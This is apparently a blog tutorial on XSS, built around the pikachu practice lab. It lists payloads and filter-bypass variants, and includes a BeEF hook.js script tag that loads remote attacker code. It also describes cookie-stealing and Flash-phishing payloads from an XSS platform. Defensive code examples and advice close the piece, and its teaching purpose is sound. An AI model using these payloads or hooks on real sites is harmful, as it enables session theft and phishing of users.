Detailed explanation of xss attack

1 XSS detailed explanation

1.1 Introduction to xss

  XSS (cross-site scripting) attacks exploit flaws left in web application code to inject malicious script into a page that other users then load and run in their browsers. The injected payload is usually JavaScript, but it can also be VBScript, ActiveX, Flash, a Java applet or plain HTML. A successful attack can give the attacker, among other things, the victim's session and cookies, private page content, and the ability to perform actions with the victim's privileges.

1.2 xss principle

  The root cause of XSS is that the program does not strictly control its input and output: attacker-controlled data reaches the page unfiltered and unencoded, and the browser parses and executes it as legitimate code.

1.3 xss hazards

  XSS mainly has the following hazards:
  1) Phishing and theft of user accounts.
  2) Stealing the user's cookies and, through them, private information.
  3) Popping up advertising pages for profit.
  4) Hijacking the user's session and performing arbitrary actions as that user.
  5) Spreading XSS worms.

1.4 xss occurrence and discovery

1.4.1 XSS occurrence process

  For example, a page echoes a submitted form value back into an input element:
  <input type="text" name="address1" value="value1from">
  If instead of a normal value the user submits the string "/><script>alert(document.cookie)</script>, the server builds:
  <input type="text" name="address1" value=""/><script>alert(document.cookie)</script>">
  The first double quote closes the value attribute, /> closes the input tag, and the browser then parses and executes the script that follows.
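  As an added example (not code from the original post), the attribute breakout above rendered by two hypothetical server-side template functions in JavaScript: the vulnerable one concatenates the raw value, the hardened one entity-encodes it first. The function names and the escapeHtml helper are assumptions for this example; the input markup and the payload are the ones shown above.

```javascript
// Added example, not code from the original post. Runs under Node.js.

// Minimal HTML entity encoder for text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Vulnerable (hypothetical) template: user input concatenated straight into the attribute value.
function renderAddressInputVulnerable(userValue) {
  return '<input type="text" name="address1" value="' + userValue + '">';
}

// Hardened version: the value is entity-encoded, so a quote in the input cannot close the attribute.
function renderAddressInputSafe(userValue) {
  return '<input type="text" name="address1" value="' + escapeHtml(userValue) + '">';
}

// Constructed payload from the page: closes the value attribute and the tag, then adds a script.
const PAYLOAD = '"/><script>alert(document.cookie)</script>';

// Rough check used only in this example: does the output contain a new <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(renderAddressInputVulnerable(PAYLOAD));
console.log(renderAddressInputSafe(PAYLOAD));
```

  In the hardened output the browser shows the payload as literal text inside the box; the attribute is never closed because every quote and angle bracket arrives as an entity.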

1.4.2 xss discovery

  Reference link: XSS attack details

1.4.2.1 Black box testing

  Find every place where user input can reach the page output: URL parameters, links, forms, input boxes, comment areas, profile editing, and so on.
  High risk: comment areas, message boards, profile editing, order information, etc.
  Medium risk: site mail, messaging, private messages, feedback forms, etc.
  Low risk: search boxes, URLs, image attributes, etc.

1.4.2.2 White box testing

  Code audit for XSS starts from the places where parameters are received and from a few keywords.
  In PHP, parameters usually arrive through $_GET, $_POST, $_REQUEST and $_COOKIE; search for all such receiving points, then follow the data to see whether it is output to the page and, if so, whether it was filtered and HTML-encoded on the way.
  You can also work backwards from output statements such as echo and print: where does the output variable come from, and can we control it? If it comes from the database, can we control what is stored there, and was the data filtered before storage?
  Most programs wrap parameter handling in shared functions in common include files; audit those functions to see what they filter and whether the filtering can be bypassed.
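  An added example (not from the original post) of the white-box procedure above as a deliberately small, regex-based source-to-sink scan over PHP text: it records the variables that receive superglobals, then flags echo/print statements that output them, or a superglobal directly, without htmlspecialchars()/htmlentities(). The PHP fragment is constructed for this example and the function name is an assumption. It is not a real taint analysis (no control flow, no function calls, no string interpolation), which is exactly why the shared helper functions mentioned above still need a manual read.

```javascript
// Added example, not code from the original post. Runs under Node.js.

const SOURCE_RE  = /\$_(GET|POST|REQUEST|COOKIE)\b/;          // where user input enters
const ASSIGN_RE  = /^\s*(\$[A-Za-z_]\w*)\s*=\s*(.+);\s*$/;     // $var = <expr>;
const OUTPUT_RE  = /^\s*(?:echo|print)\b(.*)$/;               // where data reaches the page
const ENCODER_RE = /\b(?:htmlspecialchars|htmlentities)\s*\(/;
const CAST_RE    = /\(int\)|\bintval\s*\(/;                   // numeric cast: no markup survives

function auditPhpSource(src) {
  const tainted = new Map();   // variable name -> line where it received raw input
  const findings = [];
  src.split('\n').forEach((line, idx) => {
    const n = idx + 1;
    const a = line.match(ASSIGN_RE);
    if (a) {
      const [, variable, rhs] = a;
      if (SOURCE_RE.test(rhs) && !ENCODER_RE.test(rhs) && !CAST_RE.test(rhs)) {
        tainted.set(variable, n);   // raw user input now lives in this variable
      } else {
        tainted.delete(variable);   // reassigned from something else, or sanitized
      }
    }
    const o = line.match(OUTPUT_RE);
    if (!o) return;
    const body = o[1];
    if (SOURCE_RE.test(body) && !ENCODER_RE.test(body)) {
      findings.push({ line: n, reason: 'superglobal written to output directly' });
    }
    for (const [variable, taintedAt] of tainted) {
      if (!body.includes(variable)) continue;
      // Treated as safe only when the variable is the direct argument of an encoder.
      const encoded = new RegExp('(?:htmlspecialchars|htmlentities)\\s*\\(\\s*\\' + variable + '\\b').test(body);
      if (!encoded) {
        findings.push({ line: n, variable, taintedAt, reason: 'user input echoed without HTML encoding' });
      }
    }
  });
  return findings;
}

// Constructed PHP fragment for the scan (not code from any real project).
const SAMPLE_PHP = `<?php
$name = $_GET['name'];
$msg  = htmlspecialchars($_POST['message'], ENT_QUOTES, 'UTF-8');
$id   = (int)$_REQUEST['id'];
echo "<p>Hello " . $name . "</p>";
echo "<p>" . $msg . "</p>";
echo "<p>" . htmlspecialchars($name) . "</p>";
echo $_GET['q'];
`;

console.log(auditPhpSource(SAMPLE_PHP));
```

  The scan reports line 5 (raw $name from line 2 echoed) and line 8 ($_GET echoed directly); lines 6 and 7 pass because the value was encoded either at assignment or at output.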

1.5 xss classification

  According to how the payload reaches the browser, XSS is divided into reflected, stored and DOM-based.

1.5.1 Reflected type

1.5.1.1 Principle

  Reflected XSS takes user-supplied input from a request and reflects it straight back in the response, where the browser executes it as code. The attacker normally has to lure the victim into opening a specially crafted URL carrying the malicious parameter; the payload is not stored anywhere, so it is also called non-persistent XSS.
  1) The attacker constructs a URL containing a malicious string and sends it to the victim.
  2) The attacker induces the victim to initiate this URL request.
  3) The website introduces this malicious string in the response.
  4) The victim's browser executes the malicious script in the response and sends the victim's cookie information to the attacker's server.

1.5.1.2 Attack position

  Login pages, site search boxes, and similar pages that echo a request parameter.

1.5.1.3 Case

  Note that the input box on this pikachu page has a maxlength limit. Click the box, right-click, choose Inspect and raise the value, then enter <script>alert(1)</script> and click Submit.

  Alternatively, look at the URL: clicking the button with an empty box produces message=&submit=submit, and message= is followed by whatever was typed. The maxlength restriction is only client-side and any change made in the inspector is lost on refresh, so it is simpler to put the payload after message= directly in the URL, whose base form is http://192.168.10.150/pikachu/vul/xss/xss_reflected_get.php?message=&submit=submit

1.5.2 Stored type

1.5.2.1 Principle

  Stored XSS embeds the attack script permanently in a page, typically in the database behind it. The payload lives on the server side, and every user who visits the page triggers it, so it is also called persistent XSS.
  1) The attacker uses a form on the website to insert malicious strings into the website database.
  2) The victim requests a page from the website.
  3) The website introduces a malicious string in the response and sends it to the victim.
  4) The victim's browser executes the malicious script in the response and sends the victim's cookies to the attacker's server.

1.5.2.2 Attack position

  Interactive areas such as forums, blogs, message boards, and comment areas.

1.5.2.3 Case

  Enter <script>alert(1)</script> in the comment area and click Submit.

  It then executes automatically on every subsequent load of the page: the alert fires first, and only after it is dismissed does the normal page appear.

1.5.3 DOM type

1.5.3.1 Principle

  DOM (Document Object Model) is a platform- and language-independent interface that lets programs and scripts dynamically access and update a document's content, structure and style, with the results shown in the rendered page. DOM-based XSS is a flaw in the front-end code itself: client-side JavaScript takes data from a source such as the URL and writes it into the page through a DOM sink (innerHTML, document.write and the like), so the payload never has to pass through the server. Most DOM XSS is delivered through the URL and is therefore non-persistent, like reflected XSS.
  1) The attacker constructs a URL containing a malicious string and sends it to the victim.
  2) The attacker induces the victim to open this URL.
  3) The website receives the request but does not include the malicious string in the response.
  4) The victim's browser runs the page's legitimate script, which reads the malicious string (for example from the URL) and inserts it into the page.
  5) The victim's browser executes the inserted malicious script, which sends the victim's cookies to the attacker's server.
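  An added example (not from the original post) of the sequence above in JavaScript. The /profile path, the function names and the element stand-in are assumptions for illustration; the payload is the img/onerror form from section 1.6.2. The point it makes is that the payload travels in the URL fragment, which the browser never sends to the server, and that the only thing deciding between a harmless greeting and script execution is which DOM sink the page's own script uses.

```javascript
// Added example, not code from the original post. Runs under Node.js (no browser needed).

// What the server receives for a navigation to `url`: path and query only.
// The fragment after '#' stays in the browser, so server-side filters and logs never see it.
function requestTarget(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// Stand-in for a DOM element so the two sinks can be exercised outside a browser.
// In a real browser, assigning to innerHTML parses the string as HTML; textContent does not.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// Vulnerable front-end code (hypothetical): source is location.hash, sink is innerHTML.
function vulnerableGreeting(url, el) {
  const name = decodeURIComponent(new URL(url).hash.slice(1));
  el.innerHTML = '<p>Welcome, ' + name + '</p>';   // attacker markup becomes part of the page
  return el.innerHTML;
}

// Fixed version: same source, but the value is written as text and is never parsed.
function safeGreeting(url, el) {
  const name = decodeURIComponent(new URL(url).hash.slice(1));
  el.textContent = 'Welcome, ' + name;
  return el.textContent;
}

// Constructed attack URL: the path is made up for this example.
const ATTACK_URL = 'http://192.168.10.150/profile?tab=1#<img src=x onerror=alert(1)>';

console.log('server sees:', requestTarget(ATTACK_URL));
console.log('innerHTML sink:', vulnerableGreeting(ATTACK_URL, makeElement()));
console.log('textContent sink:', safeGreeting(ATTACK_URL, makeElement()));
```

  A WAF or access log on the server sees only /profile?tab=1; finding this class of bug means reading the client-side script, not the server responses.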

1.5.3.2 Attack position

  DOM-based XSS needs no server-side reflection; it occurs wherever client-side script processes attacker-controlled data and writes it into the page.

1.5.3.3 Case

  In the pikachu DOM XSS page the front-end script writes the input into an existing tag. Input that closes that tag (or its attribute) and opens a new one is rendered by the page, which produces the XSS pop-up.

1.6 Common tags for XSS attacks

1.6.1 <script>

  Example: <script>alert("xss");</script>

1.6.2 <img>

  Triggered when the image fails to load
  Example: <img src="x" onerror=alert(1)>
  Triggered when the mouse pointer moves over the element
  Example: <img src=1 onmouseover="alert(1)">
  Triggered when the mouse pointer moves out of the element
  Example: <img src=1 onmouseout="alert(1)">

1.6.3 <a>

  Example: <a href="http://www.qq.com">qq</a>
  Triggered when the link is clicked
  Example: <a href=javascript:alert('1')>test</a>

1.6.4 <input>

  Triggered when a key is pressed down
  Example: <input type="text" onkeydown="alert(1)">
  Triggered when a character-producing key is pressed
  Example: <input type="text" onkeypress="alert(1)">
  Triggered when a key is released
  Example: <input type="text" onkeyup="alert(1)">
  Two elements with autofocus compete for focus; when focus moves from the first to the second, the first's onblur handler fires without any user action (behaviour varies by browser version)
  Example: <input onblur=alert("xss") autofocus><input autofocus>

1.6.5 <style>

  Example: <style onload=alert(1)></style>

2 XSS platform

2.1 Introduction to XSS platform

  Because XSS payloads that actually exfiltrate data are tedious to construct by hand, testers usually use an XSS platform that generates the payload and collects the cookies it returns. Be careful with such platforms: the generated code may contain other malicious components, and every result from the site you test is sent to the platform, so the platform operator learns about the vulnerability too.
  There are many XSS platforms on the Internet; none is recommended here.

2.2 XSS platform usage

2.2.1 Register XSS platform

  Once you have chosen a platform, register an account, bearing the security caveats above in mind.

2.2.2 Create project

2.2.2.1 Create project name

  Click My Projects on the left, choose Create, enter a project name and description, then continue to the next step.

2.2.2.2 Create project type

  Tick the project (module) types you want and click Configure.
  Some modules may not work: if nothing is received after several attempts, the cause may be a configuration problem, interception by the target or its WAF, or a module that is simply broken.

2.2.2.3 View code

  A View Code button in the upper right shows the generated payload. Insert it at the XSS vulnerability you found; when someone later visits that page, the platform receives the collected information.

  The platform offers many optional modules, all of which can be tested. The caveat bears repeating: the platform is run by someone else, so during testing the platform's administrators receive the same cookie values you do. For internal testing, prefer a platform you host yourself; to test a target on the public Internet, the self-hosted platform needs a public address. Guides for building your own are easy to find on Baidu.

2.2.2.4 Case Flash pop-up phishing

  Open Configuration in the project, find Flash pop-up phishing, and enter the redirect URL in full, e.g. https://www.baidu.com. Then click Configure.

  Open View Code, copy the generated payload, and insert it at the XSS vulnerability.

  To try it, use the reflected XSS page in pikachu rather than the stored one (a stored payload has to be deleted afterwards, which is a nuisance). A fake Flash update pop-up appears; clicking Upgrade redirects to the Baidu page.

3 BeEF tool

3.1 Introduction to BeEF

  BeEF (Browser Exploitation Framework) is a widely used open-source browser penetration-testing framework. It hooks victims' browsers through an XSS vulnerability with a JavaScript hook and can work together with Metasploit; it is written in Ruby and has a web interface, so it is simple to operate.
  Recent Kali releases no longer ship BeEF by default, so it must be installed separately; it currently supports only macOS and Linux.

3.2 BeEF installation

  Update the package lists before installing BeEF to avoid errors:
  apt-get update
  apt-get install beef-xss
  Updating can be slow; do something else in the meantime and install BeEF once it finishes.

3.3 BeEF startup

  Start: beef-xss
  Stop: beef-xss-stop

3.4 BeEF web login

  Login address: http://ip:3000/ui/panel
  Default account and password: beef/beef
  If BeEF asked you to set a password on first start, use that password; the account is still beef.

3.5 BeEF case test

3.5.1 Inserting construction code

  Insert <script src="http://192.168.10.20:3000/hook.js"></script> into the stored XSS page of the pikachu range (192.168.10.20 is the BeEF host here).

3.5.2 Target browser hooked

  The hooked browser appears in the BeEF panel together with the information gathered about it.

3.5.3 Pop-up window test

  Under Browser > Hooked Domain, open Create Alert Dialog, enter the text to display in Alert text, and execute it.

  The alert then appears in the hooked browser.

4 WAF bypass

4.1 Case bypass

  HTML tag and attribute names are case-insensitive, so mixed case can slip past a case-sensitive filter. The JavaScript inside the tag is case-sensitive, however: ALeRt is not alert, so only the markup is varied.
  Example:
  <script>alert("xss");</script>
  Replacement:
  <ScRipT>alert("xss");</sCRipT>

4.2 Double-write bypass

  Some filters remove a keyword once. Because the removal is a single pass, writing the keyword so that deleting one occurrence leaves another behind bypasses it.
  Example filter:

$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

  The filter replaces "on" with nothing, so oonnfocus becomes onfocus after one pass:
  <input oonnfocus="alert('xss');">
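  An added example (not from the original post) that re-implements the str_replace() blacklist above in JavaScript so the double-write bypass from this section and the case bypass from 4.1 can be run, together with the usual "repeat until nothing changes" patch and what it does and does not fix. Function names and the payload strings are assumptions for this example.

```javascript
// Added example, not code from the original post. Runs under Node.js.

const BLACKLIST = ['script', 'on', 'src', 'data', 'href'];

// Single pass, like the PHP: each keyword is removed wherever it occurs, one keyword at a time.
// String.split/join is case-sensitive, exactly like str_replace().
function blacklistFilterOnePass(input) {
  return BLACKLIST.reduce((s, word) => s.split(word).join(''), input);
}

// Repeat until a fixed point: this closes the double-write hole only.
function blacklistFilterUntilStable(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = blacklistFilterOnePass(cur);
  } while (cur !== prev);
  return cur;
}

// Constructed payloads: the page's double-written handler and a case-varied one.
const DOUBLE_WRITE = '<input oonnfocus="alert(\'xss\');" autofocus>';
const CASE_VARIANT = '<input OnFocus="alert(\'xss\');" autofocus>';

console.log(blacklistFilterOnePass(DOUBLE_WRITE));      // one pass leaves a working onfocus
console.log(blacklistFilterUntilStable(DOUBLE_WRITE));  // fixed point finally removes it
console.log(blacklistFilterUntilStable(CASE_VARIANT));  // still untouched: the match is case-sensitive
```

  Even the fixed-point version is still a blacklist: mixed case passes untouched, and HTML treats OnFocus and onfocus alike. The lasting fix is output encoding (section 5), not a longer word list.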

4.3 Whitespace bypass (space, newline and TAB)

  Browsers strip ASCII tab, line feed and carriage return characters from a URL before parsing its scheme, so javascript: is still recognised when one of those characters is inserted inside the word; a plain space is not stripped and breaks the scheme. The examples below use <img src>, which only honoured javascript: URLs in old Internet Explorer (see 4.9.2); in current browsers the same variants apply to <a href> and other URL-valued attributes. [TAB] and [LF] stand for the literal tab and newline characters, which are invisible in the original post.

4.3.1 Space bypass

  A space inside the scheme name does not work: java script: is not parsed as javascript:. Whitespace is only tolerated where JavaScript itself allows it, i.e. after the colon.
  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javascript: alert('xss');">

4.3.2 Newline bypass

  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="java[LF]script:alert('xss');">

4.3.3 TAB bypass

  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javasc[TAB]ript:alert('xss');">

4.4 Comment bypass

  Example:
  <script>alert()</script>
  Replacement:
  <scri<!--1-->pt>alert()</sc<!--1-->ript>
  This only works against a filter that strips HTML comments from the input before the result reaches the browser; the browser itself does not join the two halves of a tag split by a comment.

4.5 Character splicing

  Using eval: eval is a built-in JavaScript function that evaluates a string as code, so the filtered name can be assembled from fragments at runtime.
  Example:
  <img src="x" onerror="a='aler';b='t';c='(1)';eval(a+b+c)">
  Using top: window properties can be looked up by a concatenated string instead of by name.
  Example:
  <script>top["al"+"ert"](1);</script>

4.6 Encoding bypass

4.6.1 HTML character reference (entity) bypass

  Character references in an attribute value are decoded by the HTML parser before the URL is used, so the JavaScript body can be written entirely as numeric references.
  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javascript:&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#59;">

4.6.2 URL encoding bypass

  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javascript:%61%6C%65%72%74%28%22%78%73%73%22%29%3B;">

4.6.3 ASCII code bypass

  A bare list of character codes is not executed; the codes have to be turned back into a string with String.fromCharCode and passed to eval.
  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

4.6.4 base64 bypass

  Likewise a bare base64 string does nothing on its own; decode it with atob and evaluate the result (YWxlcnQoJ3hzcycpOw== is alert('xss');).
  Example:
  <img src="javascript:alert('xss');">
  Replacement:
  <img src="javascript:eval(atob('YWxlcnQoJ3hzcycpOw=='))">
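  An added example (not from the original post) that serves both 4.3 and 4.6: a normaliser of the kind a filter or WAF must apply before matching, written in JavaScript. It reproduces the browser's own processing order: the HTML parser decodes character references in the attribute value, the URL parser removes ASCII tab, LF and CR (but not spaces) before reading the scheme, and the body of a javascript: URL is percent-decoded before it runs. Function names and the sample list are assumptions for this example; the payload variants are the ones from the sections above.

```javascript
// Added example, not code from the original post. Runs under Node.js.

const NAMED_REFS = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };

// Step 1: what the HTML parser does to an attribute value (numeric and a few named references).
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => String.fromCodePoint(parseInt(dec, 10)))
    .replace(/&(lt|gt|amp|quot|apos);/gi, (_, name) => NAMED_REFS[name.toLowerCase()]);
}

// Steps 2 and 3: what the URL parser does before the scheme is compared, then the
// percent-decoding a javascript: body receives before execution.
function normalizeUrlAttribute(raw) {
  let s = decodeCharRefs(raw);
  s = s.replace(/[\t\n\r]/g, '');                         // tab/LF/CR are dropped anywhere
  s = s.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');       // controls and spaces only at the ends
  const m = s.match(/^([a-z][a-z0-9+.-]*):([\s\S]*)$/i);
  if (!m) return { scheme: null, body: s };               // no scheme: relative URL, harmless here
  const scheme = m[1].toLowerCase();
  let body = m[2];
  if (scheme === 'javascript') {
    try { body = decodeURIComponent(body); } catch (e) { /* malformed %xx: keep raw */ }
  }
  return { scheme, body };
}

function isJavascriptUrl(raw) {
  return normalizeUrlAttribute(raw).scheme === 'javascript';
}

// Constructed variants of the page's payloads (attribute values only).
const VARIANTS = [
  "javascript:alert('xss');",
  "java\tscript:alert('xss');",                 // 4.3.3 TAB
  "java\nscript:alert('xss');",                 // 4.3.2 newline
  "JaVaScRiPt:alert('xss');",                   // 4.1 case
  'javascript:&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#59;', // 4.6.1
  'javascript:%61%6C%65%72%74%28%22%78%73%73%22%29%3B',                                    // 4.6.2
  '&#106;avascript:alert(1)',                   // the scheme itself encoded
];

for (const v of VARIANTS) console.log(JSON.stringify(v), '->', normalizeUrlAttribute(v));
console.log(normalizeUrlAttribute("java script:alert('xss');"));   // space: no scheme at all
```

  A filter that matched the raw string for the literal text javascript: would reject only the first variant; one that normalises first rejects all seven, while correctly passing the space-broken form that no browser would run.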

4.7 Filter URL bypass

4.7.1 URL encoding bypass

  Example:
  <img src="x" onerror=document.location= 'http://www.baidu.com/'>
  Replacement:
  <img src="x" onerror=document.location='http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/'>

4.7.2 IP Bypass

4.7.2.1 Decimal

  Example:
  <img src="x" onerror=document.location= 'http://www.baidu.com/'>
  Replacement:
  <img src="x" onerror=document.location='http://2130706433/'>

4.7.2.2 Octal system

  Example:
  <img src="x" onerror=document.location= 'http://www.baidu.com/'>
  Replacement:
  <img src="x" onerror=document.location='http://0177.0.0.01/'>
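  An added example (not from the original post) for 4.7.2: the numeric host forms are reduced to dotted-quad form with the rules the WHATWG URL parser uses (0x prefix for hex, leading 0 for octal, decimal otherwise, and a last part that may fill more than one octet). Node's own URL parser applies the same rules, so a filter that compares hostnames should compare the parsed hostname rather than the raw text. The function names are assumptions for this example; the hosts tested are the page's examples.

```javascript
// Added example, not code from the original post. Runs under Node.js.

// One dotted part, as the WHATWG IPv4 parser reads it: 0x.. hex, leading 0 octal, else decimal.
function parseIPv4Part(part) {
  let radix = 10;
  let digits = part;
  if (/^0[xX]/.test(digits)) { radix = 16; digits = digits.slice(2); }
  else if (digits.length > 1 && digits[0] === '0') { radix = 8; digits = digits.slice(1); }
  if (digits === '') return radix === 10 ? NaN : 0;          // "0x" alone is 0; "" is not a number
  const valid = radix === 16 ? /^[0-9a-fA-F]+$/ : radix === 8 ? /^[0-7]+$/ : /^[0-9]+$/;
  return valid.test(digits) ? parseInt(digits, radix) : NaN;
}

// Returns the canonical a.b.c.d form, or null if the host is not an IPv4 literal (i.e. a domain).
function canonicalizeIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();   // tolerate a trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(Number.isNaN)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;   // the last part fills the remaining octets
  let addr = last;
  for (let i = 0; i < nums.length - 1; i++) addr += nums[i] * 256 ** (3 - i);
  return [addr >>> 24, (addr >>> 16) & 255, (addr >>> 8) & 255, addr & 255].join('.');
}

// The built-in URL parser performs the same canonicalisation, which is what the browser will
// actually connect to; compare this, never the raw attribute text.
function hostnameSeenByBrowser(url) {
  return new URL(url).hostname;
}

for (const h of ['2130706433', '0177.0.0.01', '0x7f.1', '127.1', 'www.baidu.com']) {
  console.log(h, '->', canonicalizeIPv4(h));
}
console.log(hostnameSeenByBrowser('http://2130706433/'));
```

  Both the decimal and the octal form from the page resolve to 127.0.0.1; a redirect or hostname filter that only knows the dotted form is bypassed by any of the equivalent spellings.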

4.8 Filter double quotes and single quotes

  If the value sits in an HTML attribute, the quotes around the attribute can simply be omitted. Inside JavaScript, a template literal delimited by backticks can replace single and double quotes.
  Example:
  <img src="x" onerror=alert('xss');>
  Replacement:
  <img src=x onerror=alert(`xss`);>

4.9 JavaScript pseudo-protocol bypass

  JavaScript can be placed in a URL after the pseudo-protocol specifier javascript:. This special scheme declares that the body of the URL is JavaScript code, which the JavaScript interpreter runs when the URL is navigated to. If the code contains several statements, they must be separated by semicolons.
javascript:var now = new Date(); "<h1>The time is:</h1>" + now;
  A javascript: URL may also contain statements that only perform an action without returning a value:
javascript:alert("hello world!")

4.9.1 <a> tag

  Description:
  The <a> tag defines a hyperlink from one page to another.
  Its most important attribute is href, which specifies the link target.
  Example:
  <a href="javascript:alert('xss');">xss</a>

4.9.2 <img> tag

  Description:
  The <img> tag embeds an image in an HTML page.
  It has two required attributes: src and alt.
  Example:
  <img src=javascript:alert('xss')>  (works only in IE7 and below)

4.10 Bypassing encyclopedia links

  Link: Comprehensive list of XSS attack bypass filtering methods

5 xss defense

  The overall idea: filter what the user submits (including URL parameters) and encode what is output. In short, filter all user-submitted content for keywords and sensitive constructs, filter the parameters in the URL, and HTML-encode everything that is dynamically written to the page by converting special characters into HTML entities, so that malicious input is displayed as text instead of being executed by the browser.

5.1 Content filtering

  Content filtering can be divided into whitelist and blacklist filtering.

5.1.1 Whitelist filtering

  Whitelist filtering lets through only content that matches an explicit allow list and rejects everything else. It eliminates most XSS, but in real environments it can also block legitimate input (false positives).

5.1.2 Blacklist filtering

  Blacklist filtering intercepts known-bad keywords and patterns. It stops many attacks, but, as section 4 shows, it can be bypassed.
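  An added example (not from the original post) contrasting 5.1.1 with 5.1.2 in JavaScript: a small whitelist sanitizer for a comment field. Instead of looking for bad words, it re-emits only tags and attributes it explicitly knows, checks href values against allowed schemes, and entity-encodes everything else as text, so the case, comment-splitting and double-writing tricks from section 4 come out as harmless text. The tag list, function names and the tokenizer are assumptions for this example; a production system should use a maintained sanitizer built on a full HTML parser (DOMPurify is one such library) rather than this regex tokenizer.

```javascript
// Added example, not code from the original post. Runs under Node.js.

// Allowed tags and, per tag, the allowed attributes. Anything else is treated as text.
const ALLOWED_TAGS = {
  b: [], i: [], strong: [], em: [], p: [], br: [],
  a: ['href', 'title'],
};
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

const TAG_RE  = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^<>]*)>/g;
const ATTR_RE = /([a-zA-Z][a-zA-Z0-9-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Only absolute http(s) URLs or same-origin paths. The raw value is checked as written
// because '&' is re-encoded on output, so the browser never sees a character reference
// that this check did not see.
function safeHref(value) {
  const v = value.replace(/[\t\n\r]/g, '').trim();
  if (/^https?:\/\//i.test(v)) return v;
  if (/^\/(?!\/)/.test(v)) return v;
  return null;
}

function whitelistSanitize(html) {
  let out = '';
  let last = 0;
  for (const m of html.matchAll(TAG_RE)) {
    out += escapeHtml(html.slice(last, m.index));           // text between tags
    last = m.index + m[0].length;
    const name = m[1].toLowerCase();
    if (!hasOwn(ALLOWED_TAGS, name)) {                       // unknown tag: shown as text
      out += escapeHtml(m[0]);
      continue;
    }
    if (m[0][1] === '/') { out += '</' + name + '>'; continue; }
    let attrs = '';
    for (const a of m[2].matchAll(ATTR_RE)) {
      const attr = a[1].toLowerCase();
      if (!ALLOWED_TAGS[name].includes(attr)) continue;      // drops onclick, style, src, ...
      const value = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4] !== undefined ? a[4] : '';
      const clean = attr === 'href' ? safeHref(value) : value;
      if (clean === null) continue;                          // javascript:, data:, protocol-relative
      attrs += ' ' + attr + '="' + escapeHtml(clean) + '"';
    }
    out += '<' + name + attrs + '>';                         // rebuilt from known-good pieces only
  }
  return out + escapeHtml(html.slice(last));
}

// Constructed inputs: legitimate markup plus the page's own bypass payloads.
const SAMPLES = [
  '<a href="https://example.com/?a=1&b=2" title="t">link</a>',
  '<b onmouseover="alert(1)">hi</b>',
  '<a href="javascript:alert(1)">x</a>',
  '<ScRipT>alert(1)</sCRipT>',
  '<img src="x" onerror=alert(1)>',
  '<scri<!--1-->pt>alert()</sc<!--1-->ript>',
  '<input oonnfocus="alert(\'xss\');" autofocus>',
];
for (const s of SAMPLES) console.log(s, '->', whitelistSanitize(s));
```

  The output is always rebuilt from parsed, known-good pieces, never by deleting substrings from the input, which is why none of the section 4 tricks has anything to work against. The price is the false positives 5.1.1 mentions: a legitimate <img> or <table> in a comment is shown as text until it is added to the allow list.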

5.2 http only attribute

  Set the HttpOnly flag on the session cookie on the server (for example Set-Cookie: PHPSESSID=...; HttpOnly; Secure), so that client-side script cannot read it through document.cookie. An XSS payload can then still act inside the page on the victim's behalf, but it cannot steal the session token directly.

5.3 Explicit input content

  Define the expected type of each input (phone number, number, password, email address, etc.) and reject anything that does not fit that type.

5.4 Input content length control

  Impose length limits on untrusted content. For example, if a phone number has 11 digits, limit the field to 11 characters. This cannot prevent XSS on its own, but it makes a working payload harder to fit.

5.5 Security measures

  Add CAPTCHAs, and deploy protection such as a WAF (software or hardware).

Origin: blog.csdn.net/weixin_44268918/article/details/127872483